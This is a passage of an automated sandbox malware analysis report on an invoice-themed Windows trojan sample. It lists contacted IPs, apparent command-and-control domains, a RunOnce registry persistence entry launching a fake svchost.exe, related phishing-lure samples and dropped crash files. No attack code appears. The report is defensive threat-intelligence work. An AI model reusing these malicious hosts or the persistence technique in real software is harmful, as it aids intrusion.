                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                            		high
                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                                  		high
                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                                      		high
                                      https://go.microd:powershell.exe, 00000001.00000003.748547781.0000000005A2C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmpfalse
                                          		high
                                          https://sectigo.com/CPS0CCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://sectigo.com/CPS0DCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                              		high
                                              http://crl.micrpowershell.exe, 00000005.00000003.877512223.0000000009A1C000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.938217593.0000000004EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpfalse
                                                		high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                157.97.120.21
                                                		unknownNetherlands
                                                		201975UNISCAPEBIT-ServicesHostingNLfalse
                                                172.67.172.17
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUStrue
                                                185.157.161.86
                                                		unknownSweden
                                                		197595OBE-EUROPEObenetworkEuropeSEfalse

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:358392
                                                Start date:25.02.2021
                                                Start time:15:09:08
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 17m 48s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:CN-Invoice-XXXXX9808-19011143287994.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:33
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@50/24@7/4
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 100% (good quality ratio 95.8%)
                                                • Quality average: 83%
                                                • Quality standard deviation: 25.9%
                                                HCA Information:
                                                • Successful, ratio: 93%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 104.42.151.234, 13.88.21.125, 104.43.193.48, 13.64.90.137, 8.248.143.254, 8.248.149.254, 8.248.117.254, 67.27.159.254, 8.253.207.121, 40.88.32.150
                                                • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                15:10:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbY explorer.exe "C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe"
                                                15:10:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbY explorer.exe "C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe"
                                                15:10:35API Interceptor43x Sleep call for process: powershell.exe modified
                                                15:11:14API Interceptor1x Sleep call for process: WerFault.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                172.67.172.17RFQ_#2021-2-25-1.pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/099966AA4311D7113F5BB60B93F45E2A.html
                                                PRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/645C0E3DC93FA95B6C8A8ED7479D7BE0.html
                                                Sample Request for Proposal for Auditing Services.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/047C6EE29B052DE5AEEBC4044252D106.html
                                                DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/40146EDED8BA63D6AE3F2DAF99B02171.html
                                                Dekont.pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/543D6276259C453DE82D4E8A6F9C519D.html
                                                order inquiry.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/AE1CA9ADC0D7C9BC87D3746C7E358920.html
                                                IMG_5771098.xlsxGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/F31A591A992F9F10459CA91956D4B922.html
                                                2070121SN-WS.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/D67358B78A0270CCB5939EF8C3384EB0.html
                                                SAL-0908889000.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/707A5EEA0CF5BEFE1A44A93C9F311222.html
                                                Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/A0BC51B15BADC621E7C2DA57F1F666B5.html
                                                Payment Notification.docGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/C31D970F225E46D6FFA42B117CC87914.html
                                                PO98000000090.jarGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/6CE96E65ABD2B0982219B89A4C828006.html
                                                P O DZ564955B.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/EE9C9D2BE71BE93E8EF2E1EE1CA658F4.html
                                                PO98000000090.jarGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/991C9BCC0F549AF2B1F88216FC377C57.html
                                                ORIGINAL090000000.jarGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/768CB08D476E7FF779DD1110D477974C.html
                                                Fireman.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/F245078D9F23F950E50BB0B3E5A55F73.html
                                                PO No. 2995_pdf.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/19F80EF211BCE8F026E05C220DD03823.html
                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/55DEF9932F060D16BC71F37E3F290A51.html
                                                CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/4F54EC6FA5BCCB7C8CBF2FD8D36F4A4B.html
                                                payment confirmation 0029175112.exeGet hashmaliciousBrowse
                                                • coroloboxorozor.com/base/E3603C7B68AE45466E5D0F32A9A21541.html
                                                185.157.161.86CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                  CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                    CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                      Order_List_PO# 081929.exeGet hashmaliciousBrowse
                                                        order-1812896543124646450.exeGet hashmaliciousBrowse
                                                          order-181289654312464649.exeGet hashmaliciousBrowse
                                                            order-181289654312464648.exeGet hashmaliciousBrowse
                                                              Order_1101201918_AUTECH.exeGet hashmaliciousBrowse
                                                                50404868-c352-422f-a608-7fd64b335eec.exeGet hashmaliciousBrowse
                                                                  74725794.pdf.exeGet hashmaliciousBrowse
                                                                    Order_List_PO# 0819289.exeGet hashmaliciousBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      nanopc.linkpc.netCN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                      • 185.192.70.170
                                                                      CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      Order_List_PO# 081929.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      order-1812896543124646450.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      order-181289654312464649.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      order-181289654312464648.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      ORDER PMX-PT-2001 STOCK+NOVO.exeGet hashmaliciousBrowse
                                                                      • 185.157.162.81
                                                                      DHL_10177_R293_DOCUMENT.exeGet hashmaliciousBrowse
                                                                      • 105.112.101.201
                                                                      coroloboxorozor.comRFQ_#2021-2-25-1.pdf.exeGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      PRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      Sample Request for Proposal for Auditing Services.exeGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      Dekont.pdf.exeGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      order inquiry.exeGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      IMG_5771098.xlsxGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      YrdW0m2bjE.exeGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      em6eElVbOm.exeGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      2070121SN-WS.exeGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      DOC-654354.xlsxGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      xQHJ4rJmTi.exeGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      RFQ CSDOK202040890.exeGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      SAL-0908889000.exeGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      Payment Notification.docGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      SecuriteInfo.com.Artemis30F445BB737F.24261.exeGet hashmaliciousBrowse
                                                                      • 104.21.71.230
                                                                      PO98000000090.jarGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      P O DZ564955B.exeGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      PO98000000090.jarGet hashmaliciousBrowse
                                                                      • 172.67.172.17

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      CLOUDFLARENETUStwistercrypted.exeGet hashmaliciousBrowse
                                                                      • 104.18.28.12
                                                                      C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                      • 104.16.18.94
                                                                      C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                      • 104.17.234.204
                                                                      Returned Message Body.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      W175EHpHv3.exeGet hashmaliciousBrowse
                                                                      • 172.67.194.108
                                                                      Bankdaten #f6356.pdf.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      W175EHpHv3.exeGet hashmaliciousBrowse
                                                                      • 172.67.194.108
                                                                      PO#2102003.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      Qvc Order .exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      company inquiry.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      Neue Bestellung_WJO-001, pdf.exeGet hashmaliciousBrowse
                                                                      • 104.21.19.200
                                                                      Order NX-LI-15-0001.exeGet hashmaliciousBrowse
                                                                      • 104.21.19.200
                                                                      TNT eInvoice_pdf.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      000INV00776.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      SAES-0077766.exeGet hashmaliciousBrowse
                                                                      • 104.21.19.200
                                                                      PO.Attached98736.PDF.exeGet hashmaliciousBrowse
                                                                      • 104.21.19.200
                                                                      mif000262021.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      PAYMENT SWIFT USD96110_PDF.exeGet hashmaliciousBrowse
                                                                      • 104.21.19.200
                                                                      RFQ_#2021-2-25-1.pdf.exeGet hashmaliciousBrowse
                                                                      • 172.67.172.17
                                                                      OBE-EUROPEObenetworkEuropeSEDHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                                      • 185.157.160.229
                                                                      cm0Ubgm8Eu.exeGet hashmaliciousBrowse
                                                                      • 185.86.106.202
                                                                      hKL7ER44NR.exeGet hashmaliciousBrowse
                                                                      • 185.86.106.202
                                                                      Waybill.exeGet hashmaliciousBrowse
                                                                      • 217.64.151.17
                                                                      New purchase order PO 78903215,pdf.exeGet hashmaliciousBrowse
                                                                      • 185.86.106.202
                                                                      xRxGPqypIw.exeGet hashmaliciousBrowse
                                                                      • 185.86.106.202
                                                                      CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                                      • 185.157.160.233
                                                                      REVISED ORDER 2322020.EXEGet hashmaliciousBrowse
                                                                      • 185.86.106.202
                                                                      muOvK6dngg.exeGet hashmaliciousBrowse
                                                                      • 45.148.16.42
                                                                      RE ICA 40 Sdn Bhd- Purchase Order#6769704.exeGet hashmaliciousBrowse
                                                                      • 185.86.106.202
                                                                      Offer Request 6100003768.exeGet hashmaliciousBrowse
                                                                      • 185.86.106.202
                                                                      CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      JFAaEh5hB6.exeGet hashmaliciousBrowse
                                                                      • 45.148.16.42
                                                                      BMfiIGROO2.exeGet hashmaliciousBrowse
                                                                      • 45.148.16.42
                                                                      SLAX3807432211884DL772508146394DO.exeGet hashmaliciousBrowse
                                                                      • 194.32.146.140
                                                                      CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                      • 185.157.161.86
                                                                      18.02.2021 PAYMENT INFO.exeGet hashmaliciousBrowse
                                                                      • 185.157.160.233
                                                                      DHL_Shipment_Notofication#554334.exeGet hashmaliciousBrowse
                                                                      • 217.64.149.164
                                                                      07oof4WcEB.exeGet hashmaliciousBrowse
                                                                      • 45.148.16.42

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exePRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                                        DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                                          em6eElVbOm.exeGet hashmaliciousBrowse
                                                                            Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                              Fireman.exeGet hashmaliciousBrowse
                                                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                                                  CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                                                    payment confirmation 0029175112.exeGet hashmaliciousBrowse
                                                                                      Vrxs6evJO7.exeGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exeGet hashmaliciousBrowse
                                                                                          RMe2JcmlSh.exeGet hashmaliciousBrowse
                                                                                            New Order 2300030317388 InterMetro.exeGet hashmaliciousBrowse
                                                                                              CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                                                                PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                                                                  CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                                                                    quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                                                                      PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                                        New Order.exeGet hashmaliciousBrowse
                                                                                                          PO#87498746510.exeGet hashmaliciousBrowse
                                                                                                            TT.exeGet hashmaliciousBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_DICYYIQK30AZ1ATY_61d1cfef5cda9156e8bf5d3a5ef80772aa5bd7d_4c8b36b8_1802e6ce\Report.wer
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16870
                                                                                                              Entropy (8bit):3.7832288732112116
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:mzpqrjj/DmHBUZMXyzlaKsUO+CZFz/u7sAS274Itx09N:0pqrjjyBUZMXyzlaqqp/u7sAX4Itx09N
                                                                                                              MD5:7064487E63E3A4637297CCD632E63772
                                                                                                              SHA1:A6DCE963E361F60A0AA1F4E7ACC5EA7139606B8C
                                                                                                              SHA-256:F01915073C4D7743D8DB767606AC3720E757BA12BFEABB3CD82F2B17563652CD
                                                                                                              SHA-512:EE78B30ACA1603509CCC9ED8C47882CE5DBA7DC262C00F8344B16E3C60E7BF9599AFE73FFDEDCC24F3A67F34158441EEB61253201F3DFD3206515EB34699ED56
                                                                                                              Malicious:false
                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.7.3.5.8.3.9.0.3.4.0.8.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.7.3.5.8.7.1.7.8.3.9.7.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.e.8.c.d.a.a.-.5.5.6.6.-.4.d.0.f.-.b.c.6.c.-.0.2.f.b.f.d.4.5.7.4.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.1.4.8.1.1.1.-.6.a.c.4.-.4.6.e.1.-.b.7.c.4.-.f.c.8.d.4.7.b.f.1.1.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.N.-.I.n.v.o.i.c.e.-.X.X.X.X.X.9.8.0.8.-.1.9.0.1.1.1.4.3.2.8.7.9.9.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.e.0.-.0.0.0.1.-.0.0.1.b.-.f.d.9.c.-.f.f.e.4.7.f.0.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.3.f.a.6.9.0.4.8.9.5.0.d.8.d.7.8.b.5.5.7.d.2.9.9.f.f.a.8.6.8.0.0.0.0.0.9.0.4.!.0.0.0.0.3.2.0.d.e.a.6.3.2.8.9.c.a.d.5.6.8.5.c.f.b.a.3.9.5.d.6.7.3.1.4.2.f.8.5.f.c.6.f.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D4B.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Feb 25 14:10:52 2021, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):315756
                                                                                                              Entropy (8bit):3.8109134708487242
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:FmIQyDfKoVveyn690bXjd+pxXAeYgIisW9gIOgF5TNbe0FUCgUBFD6:AIHTKgvO90bAp79RpDTFeSTj3e
                                                                                                              MD5:3F24F840B9869D223F418F51FDF47CE1
                                                                                                              SHA1:AF8472652BCE682B6E7C40F52970085B9CC09760
                                                                                                              SHA-256:72C7F9ED7BC6EA7DABD19108F7139DE3C2CBD01655952E74876D294854DE4ABC
                                                                                                              SHA-512:68F5FAE6D98A148ADFD411CA59D5D8CD675F34E70D5EC92D83CD73E03059174EECFE5FE3078D7DF04B0C46989A71B153F56119CE838671DC985EABAEC63BF11C
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... ........7`...................U...........B......4-......GenuineIntelW...........T.............7`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E2E.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8494
                                                                                                              Entropy (8bit):3.710666372851257
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNiKeD60V6Yr/SU+N5mTKTPgmfZoS/+pry89bZ6sf3xzm:RrlsNiKC6m6YTSU+N5mObgmfSSAZZf3o
                                                                                                              MD5:5791974E34FF7956C4D230782FB8F5A6
                                                                                                              SHA1:FAD63F7331FE93C1139385D36564AA23636F297D
                                                                                                              SHA-256:DF2F547053D6C1D141602D01960B93BA93B65B78AC1324345BFEFFC4D2F9CE36
                                                                                                              SHA-512:2BE303A58ED70D8DC700B87D52D30391277D9A8B0A147AC2F6DA53A02BADD73501700F4F049724BDC18D42E88B051D960408B23AF82C07FBE368EE45F5A6825C
                                                                                                              Malicious:false
                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.1.6.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA68B.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4800
                                                                                                              Entropy (8bit):4.567228996532901
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zs1tJgtWI9rKkWSC8Bvs8fm8M4Jeh/FFht+q8vFh//KA71zd:uITf1HcKSNxRJu5tKrHKA71zd
                                                                                                              MD5:50E2A91F31E670B3054F60A2D52F8528
                                                                                                              SHA1:6782321474333481C3B34B19D02AA6040FAAE43F
                                                                                                              SHA-256:C7B28C9B73B1C111AA04D79D2544CBDF75DD194D61CC392EBEAD7A5120174720
                                                                                                              SHA-512:47FCD52CFD76B663B9A066BD35DF9525B0865A3EFB8EC71FDA0A773EACC80C37D88BDCBC3866FB580903F20DDBCACF44EC8534C01A5B6A7867085BA5CB81E8E5
                                                                                                              Malicious:false
